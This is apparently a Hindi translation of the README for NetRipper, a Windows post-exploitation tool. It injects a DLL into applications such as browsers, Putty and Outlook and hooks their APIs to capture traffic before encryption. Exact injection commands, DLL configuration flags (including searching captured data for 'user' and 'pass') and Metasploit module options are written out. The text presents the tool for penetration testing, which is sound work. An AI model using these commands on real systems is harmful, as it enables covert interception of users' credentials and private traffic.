
NetRipper - प्रवेश परीक्षकों के लिए स्मार्ट ट्रैफ़िक स्निफ़िंग
NetRipper एक पोस्ट-एक्सप्लॉइटेशन टूल है जो विंडोज सिस्टम को लक्ष्य करता है और नेटवर्क ट्रैफिक को इंटरसेप्ट करने के लिए API हुकिंग का उपयोग करता है, एक निम्न विशेषाधिकार वाले उपयोगकर्ता से, सादा-पाठ ट्रैफिक और एन्क्रिप्टेड ट्रैफिक दोनों को एन्क्रिप्शन से पहले/डिक्रिप्शन के बाद कैप्चर करने में सक्षम।
NetRipper को Defcon 23, लास वेगास, नेवादा में जारी किया गया था।
पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए NetRipper का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं लेते हैं और इस प्रोग्राम के कारण किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं!
पेनिट्रेशन टेस्ट में पोस्ट-एक्सप्लॉइटेशन गतिविधियाँ चुनौतीपूर्ण हो सकती हैं यदि परीक्षक के पास पूरी तरह से पैच किए गए, अच्छी तरह से कॉन्फ़िगर किए गए विंडोज मशीन पर निम्न-विशेषाधिकार हों। यह कार्य परीक्षक को उसके निम्न-विशेषाधिकार अधिकारों के बावजूद, समझौता की गई मशीन पर एप्लिकेशन के नेटवर्क ट्रैफिक को स्निफ करके उपयोगी जानकारी खोजने में मदद करने के लिए एक तकनीक प्रस्तुत करता है। इसके अलावा, एन्क्रिप्टेड ट्रैफिक को एन्क्रिप्शन लेयर पर भेजे जाने से पहले भी कैप्चर किया जाता है, इस प्रकार सभी ट्रैफिक (स्पष्ट-पाठ और एन्क्रिप्टेड) को स्निफ किया जा सकता है। इस तकनीक का कार्यान्वयन NetRipper नामक एक उपकरण है जो ऊपर उल्लिखित कार्यों को करने के लिए API हुकिंग का उपयोग करता है और जिसे विशेष रूप से पेनिट्रेशन टेस्ट में उपयोग करने के लिए डिज़ाइन किया गया है, लेकिन इस अवधारणा का उपयोग कर्मचारियों के नेटवर्क ट्रैफिक की निगरानी या किसी दुर्भावनापूर्ण एप्लिकेशन का विश्लेषण करने के लिए भी किया जा सकता है।
NetRipper को निम्नलिखित से नेटवर्क ट्रैफिक कैप्चर करने में सक्षम होना चाहिए: Putty, WinSCP, SQL Server Management Studio, Microsoft Outlook, Google Chrome, Mozilla Firefox और कई अन्य उपकरण। सूची इन अनुप्रयोगों तक सीमित नहीं है, लेकिन अन्य उपकरणों को विशेष समर्थन की आवश्यकता हो सकती है।
NetRipper.exe - Configures and inject the DLL
DLL.dll - Injected DLL, hook APIs and save data to files
netripper.rb - Metasploit post-exploitation module
AppVeyor पर एक स्वचालित बिल्ड उपलब्ध है। बाइनरी को आर्टिफैक्ट्स अनुभाग यहाँ से डाउनलोड किया जा सकता है।
Injection: NetRipper.exe DLLpath.dll processname.exe
Example: NetRipper.exe DLL.dll firefox.exe
Generate DLL:
-h, --help Print this help message
-w, --write Full path for the DLL to write the configuration data
-l, --location Full path where to save data files (default TEMP)
Plugins:
-p, --plaintext Capture only plain-text data. E.g. true
-d, --datalimit Limit capture size per request. E.g. 4096
-s, --stringfinder Find specific strings. E.g. user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
msf exploit(multi/handler) > use post/windows/gather/netripper/netripper
msf post(windows/gather/netripper/netripper) > show options
Module options (post/windows/gather/netripper/netripper):
Name Current Setting Required Description
---- --------------- -------- -----------
DATALIMIT 65535 no The number of bytes to save from requests/responses
DATAPATH TEMP no Where to save files. E.g. C:\Windows\Temp or TEMP
DLLPATH no Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...
PLAINTEXT false no True to save only plain-text data
PROCESSIDS no Process IDs. E.g. 1244,1256
PROCESSNAMES no Process names. E.g. firefox.exe,chrome.exe
SESSION yes The session to run this module on.
STRINGFINDER DEFAULT no Search for specific strings in captured data
PROCESSNAMES या PROCESSIDS सेट करें और चलाएँ।
@HarmJ0y ने Invoke-NetRipper.ps1 PowerShell कार्यान्वयन जोड़ा NetRipper.exe का कृपया ध्यान दें कि पावरशेल मॉड्यूल अपडेट नहीं है।
आप "Changelog.md" फ़ाइल में चेंजलॉग और "Compilation.md" फ़ाइल में संकलन निर्देश पा सकते हैं।
NetRipper उपयोग करता है
Ionut Popescu (@NytroRST)